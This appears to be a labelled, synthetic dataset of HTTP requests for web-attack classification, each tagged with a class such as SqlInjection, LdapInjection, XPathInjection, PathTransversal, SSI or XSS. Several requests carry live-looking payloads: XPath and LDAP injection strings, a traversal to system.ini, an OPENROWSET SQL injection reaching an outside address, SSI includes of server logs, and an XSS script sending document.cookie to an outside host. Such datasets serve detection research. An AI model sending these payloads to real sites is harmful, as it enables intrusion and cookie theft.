GET /04/MImocha6xpin.Zv-lw/_1insertLGBVdSRat/e@mDWaNeIBh1/a9sMgfRdtpI9Ic-o/crolgznOtntiaIee5/9fhstPiOinyh/-formieX/iP.asmx?8xqfLQJtmp=39569&7rrKhSrt=9++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++++263%3D&hactt7loaa=+t%28%3C%3E&snsEsFIwiesea=1871292&6o=dnh160es&eaEdSqNeaEt2t=986878&fnapecOlns=cpIasbn&HPgCj9lk=tu HTTP/1.1
Host: www.fier.cz:2
Connection: close
Accept: audio/basic, text/*
Accept-Charset: shift_jis;q=0.9, cp-936
Accept-Encoding: compress;q=0.1
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 236.200.66.115
Cookie: eeiEtespaoqr=l;anr;5re=g5rfobjectv;ZPjG-y=k;O;lnveii=807005232;N0aH2sH=ar7%|mdoet)hUi;milngozywicee=hk
Cookie2: $Version="7"
Date: Mon, 14 Sep 09 23:08:33 CET
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: oTadc
From: ohlydam@WdehaAi.biz
If-Modified-Since: Mon, 22 Aug 05 16:28:36 UTC
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: *
If-Range: "lAYvHJzhWGqTjWDvS"
Max-Forwards: 729
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: i0phE o2nl=eewznpi
Range: 98475-041,374-
Referer: http://www.bwNnd.biz/nihi/yeuez/etle/uhn5.mp3
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/4.6 (compatible; MSIE 4.9; Win98; smrOsre; fttLaIyais; ahggB)
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 967x245
Via: 8.6 94.54.172.124, HTTP/2.2 www.ohauAtrk.html:043, ainsta/1.4 www.OtiNEe1.gif
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 490 229.47.175.202 "enpes8N" 
X-Forwarded-For: 56.172.198.103
X-Serial-Number: 6075380404911977
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49848
Start - Id: 38841
class: LdapInjection
GET /nre0a/apzxMN3Iagsj3lhS/tehaAheiw/sa4hTtae9uivrrn/86.asmx?nod5yaqNy=0ZDo8Z5&er2Gzoo=lcq%28&3nvDYqH.Aservices=8&VCWDL9m=7340512&eeeZartn=Nily%29%28+++%7C+%28isjo%3D*%29 HTTP/1.1
Host: www.oegI.fr
Connection: close
Accept: image/gif;q=0.2
Accept-Charset: big5;q=0.9, euc-jp;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=459
Client-ip: 247.197.51.53
Cookie: I@LSqTw=eLXmq.;Lbpionenc=EolatfuiqAaaSabhre
Cookie2: $Version="98"
Date: Wed, 02 Jan 08 07:55:40 GMT
ETag: W/"b8iI30owSuLZ2t5gMvqm"
Expect: 100-continue
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Wed, 20 Oct 04 10:41:46 UTC
If-Unmodified-Since: Sat, 06 Oct 07 02:08:42 CET
If-Match: *
If-None-Match: "IZboz256OuOjhJvGyyKG"
If-Range: "OVe.1tJouJu6XS-3bi"
Max-Forwards: 88
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Digest realm
Range: 9339-
Referer: /Btmhtjit/eouE0hte/wsttuk.swf
TE: gzip;q=0.5,trailers
Trailer: User-Agent
User-Agent: iBzReHTZ7c http://www.tey0rn.ch
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 072x4241
Via: HTTP/8.4 26.230.238.175
Transfer-Encoding: identity
Upgrade: 1to/8.7, hEen5n/0.3
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 465738
----: ----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38841
Start - Id: 45407
class: PathTransversal
POST /r2nnft3te/lX1Aq0/xholreisn3ea/ag159j/DDAhRjIH/3PvupDrF6LTu4c/mmm2ighexletYn7iE.cgi? HTTP/1.1
Content-Length: 130
Content-Language: oeNtio1u
Content-Encoding: deflate
Content-Location: /inlL/yocePe/oWsihc/tdrvo/rphn8s.jpeg
Content-MD5: ZHRMb2Vkc2FpbWdlaWxTdw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Feb 05 18:50:20 GMT
Last-Modified: Sat, 25 Aug 07 07:16:01 CET
Host: www.t6heeteaht.fr
Connection: close
Accept: application/*, audio/*, audio/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: g-trht
Cache-Control: no-transform
Client-ip: 204.131.31.4
Cookie: nEae=isjs5srrEuEx
Cookie2: $Version="36"
Date: Thu, 11 Jun 09 01:59:53 UTC
ETag: "WCamEE4jLaBwbRq"
Expect: tfrsm=sosgerh;sBoaj3pd=n6aTco
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: "Ca7G-c1Fsah1tqkn"
If-None-Match: *
If-Range: "is5.OAWIIPMufqKrAkWQ"
Max-Forwards: 57
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: qei4S 0e1e=mede
Authorization: Basic ODZ0YWE6cnZ5cnd6d3A=
Range: 50-63221
Referer: http://arev.org/etrt/2Eue7.php
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.2 (Machintosh; U; PPC Mac OS X 8.9; rg-to; rv:0.6.9) Gecko/48064510
UA-CPU: MIPS
UA-Disp: 9471,9312,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: 1.7 www.EeUye.jpeg:2471, FTP/5.2 14.230.33.46, 9.5 244.163.75.91
Transfer-Encoding: nl5ei
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 279789
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sjp3sE6bqhwxefo=dsO9?cuar&x5jHochildeTAuGB=nhsrOEgioorhttae&8b=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini

End - Id: 45407
Start - Id: 41470
class: SqlInjection
PUT /E8rFn/pfiycQzMUY-PpXdA4mty/cRs/GUzN-/Tae_nTuD2.WJL3/en1GNoss0JN06/iK9Y7dDm/XrrupanNttoneahtInm2/2arKfk/rE40kxJGSf2Pzb.tiff? HTTP/1.1
Content-Length: 384
Content-Language: nDp,intta,lymsoh
Content-Encoding: compress
Content-Location: http://gh5taIdh.uk/hiMNae.asp
Content-MD5: ZWZBZXJqZXByaWtpdGliZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Mar 09 24:02:02 UTC
Last-Modified: Fri, 26 Jun 09 10:45:15 GMT
Host: www.fhintp.fr:1037
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, identity, gzip
Accept-Language: pnnE-wa, xti-n6Gw3t, T1s-tftjFnvn;q=0.3, sfnt-oseottCi
Cache-Control: max-stale
Client-ip: 79.61.119.137
Cookie: ageu=32182;62oV2P=rcpsepvwo%isnmsbc+eallsock_streame;teunensR=alessr-ny;Nehw6epsat=8;2n=2
Cookie2: $Version="39"
Date: Mon, 15 Mar 10 18:16:57 GMT
ETag: "WmWw5By6q9UJ5oawex"
Expect: 100-continue
From: esmpc@i8faf.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Wed, 02 May 07 21:36:52 GMT
If-Match: "IMoV9M_MRk@qK@0cdtf2"
If-None-Match: "S0Pyek_HVBgIUaZC"
If-Range: *
Max-Forwards: 0
MIME-Version: 2.7
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Digest username="syteln"
Range: 863-,45-,1-
Referer: http://iois.be/nnIyT/Aectwqm/yreilOia/A5vtr.tar
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.9 (compatible; tteor; Win98; rnir)
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 054x8213
Via: HTTP/6.7 www.w565Srho.png:855, FTP/2.1 117.241.8.95, alA/8.1 210.240.214.11
Transfer-Encoding: gzip
Upgrade: 1hra7/0.2, eel/4.6, 5zasm/2.3, mh5e6a/4.1
Warning: 249 www.uAeCe.html "trBe" "Sun, 14 Jan 07 18:57:15 GMT"
X-Forwarded-For: 158.24.142.97
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

an4tthZ6me=07&tnohcfytirnj=4sp&omnh=sw.P&8TtvarusrXH.=buIpassthruS &4mogrThcO=itvhaoshtr&kt9Intsus5e=;   select    *   from     OPENROWSET('SQLoledb','uid=ltashaI;pwd=hearsa;Network=DBMSSOCN;Address=88.17.231.239,83897;','select     *  from  ii5Es'    )&y0oewioxu=lre&it3onr=oslE4A&pQfhbc=shaxohe&irat06fe4e=[senp0iframexxte&uoHtemamp=dBA3B1O

End - Id: 41470
Start - Id: 38880
class: LdapInjection
GET /7S2e4zhdrnupl/E8.divvppjLhx/jEQVncfgQzEp4/fXJ/jnroel/itaODSebsTmtaa1uJo/esSp/ha5n/ouaopzsg2vimrqaEc9.jpg?tto=aM2bX99&ss=0791&TN6Qhtpassytm0Nmeta=gsueamjC&i3tet=mochaoheeag%24teo&cu=owhH&Dkf_7NNg4=script3E2&p5reDq=ps%2609all+srtiao+T+o&hdeiqiflCeninbe=tami4uN1beawtdn&kTevspesdt=ay5%7Ch&eeE0oititnb7fkr=%29%28+%7C++++%28displayName%3Dhad*%29%28name+%3D++had*+++%29%28+++mail%3Dhad*%29&Srso9srr4Pszmnd=5&nullH_oaA9=3EUz HTTP/1.1
Host: 89.185.201.42
Connection: bsteg
Accept: */*
Accept-Charset: windows-1255, iso-2022-kr;q=0.1, big5;q=0.6, utf-7, euc-cn;q=0.1
Accept-Encoding: gzip, identity, identity;q=0.5, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 185.212.239.81
Cookie: hluNit=sYl;CexecKQbcatZI=5ecemrl;ossb=22;RVGZG7=i8rEnr\;fu8USckbRAR=re(;V_PQ=535818655
Cookie2: $Version="1"
Date: Mon, 26 Sep 05 10:23:28 GMT
ETag: W/"tVhWFQtdP2iMT@NE.l"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sun, 13 May 07 11:55:06 UTC
If-Unmodified-Since: Tue, 21 Apr 09 17:39:38 CET
If-Match: "me2C6EiJeYW.QQY.Rk3a"
If-None-Match: *
If-Range: Sun, 20 Mar 05 03:02:42 CET
Max-Forwards: 3764
MIME-Version: 1.2
Pragma: avqey=srneu
Proxy-Authorization: Basic dGFkZmhzOnR2anRr
Authorization: Digest username="ep7anefI"
Range: 15934-,799-8058,-81465
Referer: /weitR/a1oaue/Rt4eEts/ubam.msf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (Windows; U; Windows NT 2.7; rc-ui; rv:1.1.6) Gecko/20134407
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: 7.7 www.smftmxv.tiff, FTP/3.3 223.161.207.227
Transfer-Encoding: gzip
Upgrade: ynehe/0.8, dgr/5.5, rg4t/3.6
Warning: 654 173.160.4.85 "Ioao" 
X-Forwarded-For: 5.149.24.84
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38880
Start - Id: 35951
class: PathTransversal
GET /thTF.2SyngUfZrv/eiohSxeDEjslei.jpg?3HwcXpopt8GfhQ=bOK%40Q5Po27yH&mL8f8piframeZNservicesV=g%7C%270etnode0eao3oexec8Xn&ftiarorti=i%40CJewGXZD&1o44dhahf8sbos=4&Sn=T41&lero8ibyonwE=%3C%21--%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E HTTP/1.1
Host: www.aha1ah.cz
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.6, euc-cn, x-mac-chinesetrad, cp-932
Accept-Encoding: 
Accept-Language: egrt53t-onsa;q=0.1, ore-eroat, atsR-gap
Cache-Control: no-cache
Cookie: sohezb=02309214;Nglntiaz=760;bni=664
Cookie2: $Version="08"
Date: Sun, 20 Apr 08 07:24:55 UTC
ETag: "SmOVj.H66CA6Jm.jjr"
Max-Forwards: 28
MIME-Version: 1.6
Referer: http://getvdp.biz/29sto/neanD.mspx
User-Agent: edlFsnohzi (nJ_sgiK; tbz.g14u; gl1gxg00Y4)
UA-Pixels: 6901x336
Via: 7.0 www.lnoudnhg.png, 7.4 www.ial9eo.js:6
Transfer-Encoding: identity

null

End - Id: 35951
Start - Id: 49628
class: XPathInjection
GET /oan6t7/hrclelni/otBErntae/watnEt2sssnr68se/lcrmakeUUnOyOOs/ibti1aue/tyogt/@g@8cS/lanY8vsltoear/iT@6n-0Hf6kICI.png?.7mJCwhereXWZ7copyo=2&mbteqrtRtoiptsa=t8DQyt&artn3dS=13&bpmbltSdsyint6=1hniyg4o3CtKef%3D&LEwinntah2=im%27+or+++1%3C+++J%2FFffo2%2Ft%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D591%5D+++++or++++%27jT%27+++%3D++%27 HTTP/1.1
Host: 94.29.121.214
Connection: gsey
Accept: */*
Accept-Charset: iso-2022-kr;q=0.8, windows-1258;q=0.9, windows-1254;q=0.8, x-mac-arabic, koi8-r;q=0.5
Accept-Encoding: 
Accept-Language: 7jspjn-Ej;q=0.7, 7Mm7kl-an7d77E3;q=0.9, i-ibRusluE;q=0.6, jwespzhm-ortsue
Cache-Control: only-if-cached
Client-ip: 228.117.156.249
Cookie: eaahSiegni= eLbe8
Cookie2: $Version="34"
Date: Sun, 13 Jun 04 11:03:58 CET
ETag: "d_atRBP91QL9mPSF61cb"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Sat, 30 Dec 06 24:31:46 GMT
If-Unmodified-Since: Tue, 10 Apr 07 17:19:34 UTC
If-Match: "ht7p-6lBnvt3Ffw66o3c"
If-None-Match: *
If-Range: *
Max-Forwards: 900
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: inzfh eiesj=gl4ntri
Range: 31-025167,936-84
Referer: /tdrYON1e/mxosn/ofults4.conf
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/7.3 (compatible; MSIE 7.4; SunOS sun4u; bccQ)
UA-CPU: StrongARM
UA-Disp: 1996,6305,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: sLtnu/0.5 182.7.52.205, HTTP/8.3 www.tut1.jpg
Transfer-Encoding: tedco; rtyeddya=lochU
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49628
Start - Id: 38519
class: LdapInjection
GET /CZ/mOiframeVgVHF/0lkhttp/Ok/iIitkxSj/t0GW13a/ehdyi8x/03K60BR-Hhb/t1PGwL.pl?d0omad=xer&systemVlAgZ=d&qwEea0laluniit=DnntttrensgnelEtB&ihrnotCuteaair=%7CE6&P.3.E=2765%29%28%26%28objectClass%3Dt4z%29%28%7C%28sn+++%3D+++eR%29%28cn%3Dev++J*%29%29 HTTP/1.0
Host: 183.45.153.133
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, x-mac-roman;q=0.6, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: x-ANNyed, iogh5-ra0iunj;q=0.9, t5Vele-eeexo, EsRa-lniTtaT;q=0.0
Cache-Control: max-age=31
Client-ip: 83.101.237.247
Cookie: EmJ8Jewp-t=Cnulltohe>+t a0w);pitsygbeeo4t2=fsaiaal;ealet=4779;csrsthelsilaz=663
Cookie2: $Version="807"
Date: Mon, 09 Oct 06 21:56:45 GMT
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Sat, 10 May 08 07:03:09 UTC
If-Unmodified-Since: Fri, 28 Oct 05 19:21:21 CET
If-Match: *
If-None-Match: "G7ke9wOVRjSjQtb"
If-Range: Mon, 15 Sep 08 18:12:11 CET
Max-Forwards: 771
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic ZGU2ZXRmdDoyeG1pc2lsTA==
Authorization: tAEi rgTfi=rqw6ehy
Range: -087,245-62681,-648438
Referer: /e4hau6l/7aveo.mpeg
TE: gzip,deflate,trailers
Trailer: Warning
User-Agent: EOsqxn0vvk/5.2.1
UA-CPU: 68000
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: FTP/7.8 74.109.116.146:9, FTP/3.4 21.239.217.48
Transfer-Encoding: identity
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 193 117.108.90.63 "cecihsnisuuazodrattt" 
X-Forwarded-For: 138.56.211.47
X-Serial-Number: 30599
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38519
Start - Id: 39547
class: SSI
PUT /amiZAP8V3-XL33WZJIQ/dGt1nJLGYXd98/c2chialr/RperlR6bI-N/azEv/a1_Du5Qu4Mu/rsxorgluoethamtnrau.gif? HTTP/1.1
Content-Length: 337
Content-Language: kuese7
Content-Encoding: deflate
Content-Location: http://www.pcpax.gov/Demxqofq/a3ry/7dcei/nyiuHy/cssmQi.asmx
Content-MD5: NmF1UnJzYXFtenRIZ2lzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Jul 09 09:52:06 UTC
Last-Modified: Thu, 21 Sep 06 14:17:28 GMT
Host: www.ecIsnhidb.gov
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Onagoay-utii3, sdglfa-macte
Cache-Control: only-if-cached
Client-ip: 94.165.84.44
Cookie: ZreplacemwuN=s-ly_;fsaanleipge0=agwrjdrvFstfOltp
Cookie2: $Version="21"
Date: Thu, 02 Aug 07 21:20:42 GMT
ETag: W/".iU6eDHRsrc-@9hLMty"
Expect: tkvh
From: eyldn@4dpeOh3Teh.de
If-Modified-Since: Thu, 28 Jul 05 18:18:03 CET
If-Unmodified-Since: Tue, 28 Dec 04 19:24:25 CET
If-Match: "@zy.mKCE-5ORFJEI1Ve"
If-None-Match: *
If-Range: "3Z7-3ynm7.5r@1hq"
Max-Forwards: 41
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: NTLM bmFIY25hb2hocHk1dHdvb3RlcHBlbnVlb0xIbHFlY2U=
Referer: /twSIte/1vjhbl/letfmen/xtmioa.mdb
TE: trailers,gzip;q=0.9
Trailer: Expect
User-Agent: rcteqzOran/9.3.9.8
UA-Disp: 0663,736,8
UA-OS: Windows 95
UA-Color: color32
Via: HTTP/0.3 www.7nst.jpeg:86021, 9.8 56.225.69.141:82954
Transfer-Encoding: compress
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 543 www.ydocee8.html "biTseoerdCyyr4oaht" 
X-Serial-Number: 11507528452920010282
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ee6ghesise=661340197&oe6xh7nnp5=alleehea&s@lsAaPdRd@eR=27&.mKoJ-e=e8eilhTfrah7&xnauc=2406563&XxQ.tnqnetcatEu=692593&aUcjd8neo=qt&harneAtchioliOm=76755&Fphp0open8rdC=k&tnUywo=emnphwivtessot&sepnooa=ld.ttXxA&bMfu=81&rlSasteiPLieg=winnthn@m]moon3&aatplr=<!--   #include  virtual="/var/log/httpd/access.log"     -->

End - Id: 39547
Start - Id: 35080
class: SqlInjection
GET /4UrV7dCGgD-s4J9LsAi/hTu7cyKdXMqa/aydeiet7ey974te.msf?qo73E=%5Boe+&inWG1=tnetcat6&NAtptagmgu=1&em98poilot=41697&sgidabtts=echobEep&Iyb2_sIaNXB=42911360&TtisspdhE=xml8tperlmPinppeoue&heoe4snrnc=pgVMX&101selfdzeOiqnt=oyet&alrahredejiojfw=%3F-%260d0&Ha1ntn=%29ttls&mor0hnowyeee=uniii%3FEu4uR%2Fr+3tesm&phpwinntoWu8=mianemetsfhti&lu8beoiet0s1u3=22346366 HTTP/1.0
Host: 243.53.72.113
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: compress;q=0.3, compress, identity, gzip, gzip;q=0.5
Accept-Language: *
Cache-Control: max-stale=3
Client-ip: 177.243.153.138
Cookie: fl4eaoknijnic=tSs;75esogY=exa;n2sD14cdtya=hs5choThs35lr;ltS8=3;ZWtOJ5pH5xmloN=03iohc-n
Cookie2: $Version="329"
Date: Thu, 24 Dec 09 17:27:41 CET
ETag: "eBZUEjTAz_wbc-ISX"
Expect: 100-continue
From: Icdw@di9ssorE6e.com
If-Modified-Since: Mon, 31 Jan 05 11:59:10 UTC
If-Unmodified-Since: Thu, 02 Oct 08 06:45:35 UTC
If-Match: "GCA@Xsb@fcoVNjNzXsr"
If-None-Match: "OOCs16b1Z_HEiZd-gtn"
If-Range: "BxvziXyUxiR3lzRXb"
Max-Forwards: 651
MIME-Version: 0.2
Pragma: iqHthsb='rcbiu'
Authorization: Digest nc=fb5F43EE
Range: 403-
Referer: http://www.ttsid.uk/deaoDe/uTeth/daNewo.png
TE: chunked;q=0.6
User-Agent: 'select    customer_phone     '||'from   customers  '||'where     customer_surname='''||   lv_surname||'''  and    customer_type=1';
UA-CPU: MIPS
UA-Disp: 7830,290,16
UA-OS: Linux
UA-Pixels: 4116x971
Via: 6ewTtn/2.1 61.144.3.93, 2.3 www.htreewvA.js
Transfer-Encoding: deflate
X-Serial-Number: 51475
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35080
Start - Id: 35828
class: XPathInjection
GET /intarqthq/u1sSmajfvlddaoa/rE8NSxmlscriptxp1Cw/lkv7i67e4So/losk/wv3idreu9etaimens/zhsFVqpNeM/6S/og@@0voudkDtPm.mdb?uz=62254&ii=otw&ovz0antt5e=group+bynN%3Ch%3Btbw%5Ccopyeiaon&anruntcmDtHu=18863&s7SrhrntedotE=bnh&Nu=6&dIux=5CAtnodee%40t2%26urlk2ty0ec&weW6oCGV=fit&D7RPessoe2r=0060&cesa=aae%27++++or++++%28i+++%3C+count%28to%2Fchild%3A%3Atext%28%29%29++and++++j+++%3C++++count%28pt%2Fchild%3A%3Acomment%28%29%29++and+k+%3C++count%28heic%2Fchild%3A%3A*%29++++%29++++or++%27noeH%27%3D++%27+++++aedfiIn%27+or HTTP/1.1
Host: www.hatekd.be
Connection: hit3a
Accept: */*;q=0.8
Accept-Charset: big5;q=0.4, windows-1257;q=0.5, euc-kr
Accept-Encoding: identity, identity
Accept-Language: ydsr7gd-tee, d-3ij
Cache-Control: max-stale
Client-ip: 139.91.97.81
Cookie: 6thiu=asozUlh;nzwt=8331;wpiframem9No=694
Cookie2: $Version="38"
Date: Fri, 14 Apr 06 23:21:02 GMT
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Wed, 10 Jan 07 18:57:30 GMT
If-Unmodified-Since: Mon, 27 Aug 07 21:33:03 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 3.5
Pragma: eldfpwdt='zgkkEt'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM bGplUmlzMkU5QWhzdGVjc2lkczBmb2Vjb1VqdHFhc1MwZW5wdA==
Range: 77-,-9
Referer: http://ostNa.gov/fdHt9x.mspx
TE: trailers,trailers
Trailer: Host
User-Agent: Zmirs/3.4.9
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: sEenag/6.7 www.lTlj.gif, FTP/9.5 146.42.32.230, oeoMth/6.5 252.141.232.241
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 198 www.toldzft.js "aieysaloeRmyhanfuas" "Wed, 06 Aug 08 03:23:52 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 62972291005
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35828
Start - Id: 46920
class: XSS
POST /nheenmllyweuleAoU.sh? HTTP/1.0
Content-Length: 184
Content-Language: speo
Content-Encoding: compress
Content-Location: http://www.t7ex.fr/witoue/ehts/rrIswTEt/k0bgsfc/tU7ce.dll
Content-MD5: bmJvcWlyT2lhYWR0aGVpaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sat, 12 Mar 05 22:20:01 GMT
Host: 178.13.88.240
Connection: notlmt
Accept: */*
Accept-Charset: utf-7;q=0.2, gb2312;q=0.0, euc-tw;q=0.4, x-mac-turkish
Accept-Encoding: 
Accept-Language: abMP7tt-ge, ianasr-feisFhl
Cache-Control: max-age=76
Client-ip: 67.18.221.141
Cookie: sicTsl=075054;ao1rsooion=tdoa>;.BDB0_echo=ewn6ntxpzoqda;eo5fs3t=80296852;iAonnn=rDjkRB;hpaktwnItna=e1C5m62lIPJe
Cookie2: $Version="1"
Date: Sun, 30 Jan 05 18:31:47 UTC
ETag: W/"8gCraCWHramfcOb-S0.p"
Expect: 100-continue
From: nlqn@timuoEgjAR.ch
If-Modified-Since: Sat, 17 Jul 04 03:21:24 GMT
If-Unmodified-Since: Fri, 08 Oct 04 09:04:22 UTC
If-Match: "ifgnEX6zRgo.d-5uoS"
If-None-Match: "DULDF2sdSrWa0q1fz"
If-Range: Sat, 16 Jan 10 13:23:59 CET
Max-Forwards: 782
MIME-Version: 9.1
Pragma: oaci=stenrra3
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM aWxWNWxhd2h0b3VpYXRhamVldHRzZGFjYWV0aG5zaHFlaG1venFkaW03bg==
Range: -790
Referer: /ntkoiuzs/ntcul/rbh9e.js
TE: chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/6.3 (X11; U; SunOS sun4u 0.1; ah-cn; rv:0.3.8) Gecko/71732438
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: FTP/0.5 65.210.76.117
Transfer-Encoding: tkr6ic; asyxqwye=ooat
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sdtthrlsyNe=8122070708&Qy1pvZZ=-&znhh=<<script   >[document.location.replace   ('http://www.orng.com/cgi-bin/tetr.cgi'+document.cookie);]</script>

End - Id: 46920
Start - Id: 39243
class: SSI
GET /n5MsLkJq7sBvhxCA/k3/rdpx7@Ea9Z/ooeAsuesbh7m/rbLNsN/fCbgvkwV/eV.wwtF.rao.DNRRUq/yyG/3lKQ68@tou3/lygrlpEYR.swf?sdaRritoftjnsg=3911829&_b@Rdocumentlcfu1=8520&asqe4=emrs%40P&3hupdateop7lib52=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: www.mp8PM.be
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.8, euc-kr, iso-8859-6;q=0.7, x-mac-chinesetrad, us-ascii;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: ettr-do, 5Ias3og-uau;q=0.1
Cache-Control: no-cache
Client-ip: 240.199.60.134
Cookie: auebhRA4mink=616884075;nezeiontcr0noi=2329257640
Cookie2: $Version="7"
Date: Mon, 03 Sep 07 22:51:13 UTC
ETag: W/"jRsIL1CqmGtIEhLf-xD7"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Sun, 06 Sep 09 23:29:26 CET
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: *
If-None-Match: *
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 8
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: Digest qop=auth
Range: 5-9725,-6683
